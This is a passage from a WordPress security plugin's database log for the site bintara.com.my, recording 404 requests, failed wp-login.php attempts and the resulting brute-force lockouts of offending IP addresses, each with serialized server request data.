Gecko\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"89.120.146.186\";s:11:\"REMOTE_PORT\";s:5:\"34591\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYbHmQOuEH7Zn-WPWRd2BgAAAAU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569114009.5647\";s:12:\"REQUEST_TIME\";s:10:\"1569114009\";}}','notice','2019-09-22 01:00:12','2019-09-22 01:00:09',31300296,33108896,'https://bintara.com.my/?page_id=18',1,0,'89.120.146.186'),(26786,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:114:\"/?page_id=18%26error=DIFFERENT_DOMAIN%26back=http%3A%2F%2Fvintageguitar.mobi%2F%26imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:131:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.64\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:112:\"page_id=18%26error=DIFFERENT_DOMAIN%26back=http%3A%2F%2Fvintageguitar.mobi%2F%26imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"94.249.167.197\";s:11:\"REMOTE_PORT\";s:5:\"58998\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYbIi8@@KQJCXdfc6LD5NgAAAc8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569114251.7993\";s:12:\"REQUEST_TIME\";s:10:\"1569114251\";}}','notice','2019-09-22 01:04:13','2019-09-22 01:04:12',30805432,32624512,'https://bintara.com.my/?page_id=18%26error=DIFFERENT_DOMAIN%26back=http%3A%2F%2Fvintageguitar.mobi%2F%26imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'94.249.167.197'),(26787,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"44A0C235-66E9-4BB5-9CFC-01BC53E0AD5C\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYbUNzkYtOEVzsOgB0LCPgAAAJc\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"218.111.12.165\";s:11:\"REMOTE_PORT\";s:5:\"14167\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYbUNzkYtOEVzsOgB0LCPgAAAJc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569117239.7363\";s:12:\"REQUEST_TIME\";s:10:\"1569117239\";}}','notice','2019-09-22 01:54:01','2019-09-22 01:54:00',31074928,32885552,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'218.111.12.165'),(26788,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=d0b667d188e493143cc1d2e28d717ed7\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYbbkoRu5Nugk8c4xdW-QQAAANU\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"124.217.235.99\";s:11:\"REMOTE_PORT\";s:5:\"44330\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYbbkoRu5Nugk8c4xdW-QQAAANU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569119122.8427\";s:12:\"REQUEST_TIME\";s:10:\"1569119122\";}}','notice','2019-09-22 02:25:24','2019-09-22 02:25:23',31160440,32688696,'https://bintara.com.my/2019/wp-login.php',1,0,'124.217.235.99'),(26789,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-22 10:25:23\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-22 02:25:23\";s:14:\"lockout_expire\";s:19:\"2019-09-26 14:25:23\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-26 06:25:23\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-22 02:25:24','2019-09-22 02:25:23',31241720,32688696,'https://bintara.com.my/2019/wp-login.php',1,0,'124.217.235.99'),(26790,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-22 02:25:24','2019-09-22 02:25:23',31865024,32688696,'https://bintara.com.my/2019/wp-login.php',1,0,'124.217.235.99'),(26791,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"8779737D-BD5D-40AE-AA90-2889C9F0BE84\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYbl823w2nrGTPdYNRvrUQAAAEc\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:11:\"60.53.43.49\";s:11:\"REMOTE_PORT\";s:5:\"59028\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYbl823w2nrGTPdYNRvrUQAAAEc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569121779.3177\";s:12:\"REQUEST_TIME\";s:10:\"1569121779\";}}','notice','2019-09-22 03:09:41','2019-09-22 03:09:39',31075096,32888400,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'60.53.43.49'),(26792,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=4d59fa86eb6bb65db2f9089de587d593\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYbvYm3w2nrGTPdYNRvyZAAAAFc\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"124.217.235.99\";s:11:\"REMOTE_PORT\";s:5:\"52798\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYbvYm3w2nrGTPdYNRvyZAAAAFc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569124194.1093\";s:12:\"REQUEST_TIME\";s:10:\"1569124194\";}}','notice','2019-09-22 03:49:55','2019-09-22 03:49:54',31160096,32694952,'https://bintara.com.my/test/wp-login.php',1,0,'124.217.235.99'),(26793,0,'lockout','host-lockout::124.217.235.99','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:14:\"124.217.235.99\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-22 11:49:54\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-22 03:49:54\";s:14:\"lockout_expire\";s:19:\"2019-09-26 15:49:54\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-26 07:49:54\";s:12:\"lockout_host\";s:14:\"124.217.235.99\";}','action','2019-09-22 03:49:55','2019-09-22 03:49:54',31242368,32694952,'https://bintara.com.my/test/wp-login.php',1,0,'124.217.235.99'),(26794,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:14:\"124.217.235.99\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-22 11:49:54\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-22 03:49:54\";s:14:\"lockout_expire\";s:19:\"2019-09-26 15:49:54\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-26 07:49:54\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-22 03:49:55','2019-09-22 03:49:54',31242344,32694952,'https://bintara.com.my/test/wp-login.php',1,0,'124.217.235.99'),(26795,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-22 03:49:55','2019-09-22 03:49:54',31866768,32694952,'https://bintara.com.my/test/wp-login.php',1,0,'124.217.235.99'),(26796,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:68:\"Mozilla/5.0 (Windows NT 10.0; rv:60.0) Gecko/20100101 Firefox/60.0.2\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"186.206.154.38\";s:11:\"REMOTE_PORT\";s:5:\"41904\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYb7mG3w2nrGTPdYNRv7KQAAAE4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569127320.6269\";s:12:\"REQUEST_TIME\";s:10:\"1569127320\";}}','notice','2019-09-22 04:42:02','2019-09-22 04:42:01',30806336,32625488,'https://bintara.com.my/?page_id=18',1,0,'186.206.154.38'),(26797,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/service-title-5/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_ACCEPT_CHARSET\";s:36:\"utf-8;q=0.7,iso-8859-1;q=0.2,*;q=0.1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/service-title-5/\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/service-title-5/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYcBVm3w2nrGTPdYNRv@xAAAAEY\";s:12:\"REDIRECT_URL\";s:17:\"/service-title-5/\";s:11:\"REMOTE_ADDR\";s:14:\"216.244.66.228\";s:11:\"REMOTE_PORT\";s:5:\"32898\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"https://bintara.com.my/service-title-5/\";s:10:\"SCRIPT_URL\";s:17:\"/service-title-5/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\